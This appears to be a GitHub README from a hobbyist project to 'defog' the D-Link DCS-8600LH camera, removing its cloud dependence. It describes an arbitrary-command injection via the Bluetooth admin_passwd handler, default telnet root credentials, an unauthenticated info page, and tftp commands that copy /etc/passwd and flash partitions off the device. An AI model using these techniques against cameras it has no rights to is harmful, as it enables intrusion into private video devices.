andrewkopytko / defogger-8600 Goto Github PK

This is an attempt to get the DCS-8600LH defogged. Any help is deeply appreciated.

First of all: THANKS bmork! I would not have got started without your defogger for the 8000.

The script is totally based on bmork's original dcs8000lh-configure.py, which got me hopeful that the 8600 would be just as "easy". Since then I've changed by mind on the easy part.

What's changed? It still abuses the set admin_passwd code to execute arbitrary commands via BTLE, but bluetoothd on the 8600 had a new patch to the gatt-example.c which quoted the arguments to set admin_passwd. Still easy to bypass though. Also, the entire string received is now tokenized, which means semicolons (;) are not possible in the otherwise arbitrary strings you can send to the default firmware with dcs8600.py.

Also worth noting: If you run the wrong script (dcs8000lh-configure.py) on the 8600, it will mess up the admin_passwd. After that, no more arbitrary commands are possible. Easily fixed, but not via BTLE.

If everything else fails - a factory reset will get you back on track again (hold reset button for ten seconds).

Things learned so far, in no order:

• My laptop refused to change MTU on the BTLE packets, so nothing got sent in it's entirety, so I did all the BTLE communication with the camera from a Raspberry Pi 3 (Raspbian stretch/9.6, Bluez 5.43)

Firmware v1.00.10:

• When accessing the DCS-8600LH the first time after a factory reset, the script will have no idea of the name of the unit. Fix this by modifying the script at the ####-part when setting self.name.

• Start telnetd:

  $ dcs8600.py 00:11:22:33:44:55 012345 --telnetd
  This is only active until the next reboot.
or
  Create a file ".tw_enable_telnet" at the root of the SD-card and reboot the camera.
  This also makes it persistent.
or
  $ dcs8600.py 00:11:22:33:44:55 012345 --command "/bin/echo>/tmp/SDCard/.tw_enable_telnet"
  $ dcs8600.py 00:11:22:33:44:55 012345 --command "reboot"

• telnet login: root:twipc

• The key binaries are Rtk_MainProc, strmsrv, da_adaptor, cda, sa, StreamProxy - all with no released source code.

  • Rtk_MainProc listens on ports 80, 554, 443
  • da_adaptor listens on ports 8080, 8081
  • strmsrv listens on port 8088
  • StreamProxy listens on port 7000

• root filesystem is read-only

• remounting directories is possible, which makes testing changes easier and faster

    e.g # mount /etc/ /tmp/SDCard/new-etc/  

• http://CAMERA-IP/common/info.cgi will output camera information without requiring a password.

• As with the 8000LH, you can easily backup the partitions via tftp on the 8600LH as well:

  # for i in 0 1 2 3 4 5 6 7 8 9; do tftp -l /dev/mtd${i}ro -r mtd$i -p ${TFTP_SERVER}; done
or
  # ls /dev/mtd*ro|cut -c9|while read i; do tftp -l /dev/mtd${i}ro -r mtd$i -p ${TFTP_SERVER}; done

• All Bluetooth communication is logged in /tmp/blue.log

• Disable internet communication on an already fogged camera (attached to the cloud), only allowing local traffic:

  $ dcs8600.py 00:11:22:33:44:55 012345 --command "route del -net default"
or via telnet:
  # route del -net default

• If telnet login is rejected, get the current passwd:

  $ dcs8600.py 00:11:22:33:44:55 012345 --command "tftp -l /etc/passwd -r passwd -p ${TFTP_SERVER}"

• There are traces of lighttpd configuration in /etc but there is no binary

• credentials tonywu:123qwe in httpd.conf is not used anywhere as far as I know

• I have not been able to access the open services on ports 80, 443, 554, 7000, 8080, 8081, 8088 since user and password still eludes me

• If you mess up the admin_passwd during testing, fix it via telnet:

  # mdb set admin_passwd "012345"

• Dumping /dev/mem over tftp is not a problem. 128 MiB, 134217728 bytes.

• I am just above clueless about Python

Firmware v1.04.00 :

• dcs8600.py still works

• looks pretty much the same as v1.00.10

• Available at https:// mydlinkmpfw.auto.mydlink .com/DCS-8600LH/20190813-DCS-8600LH_v1.04.00.bin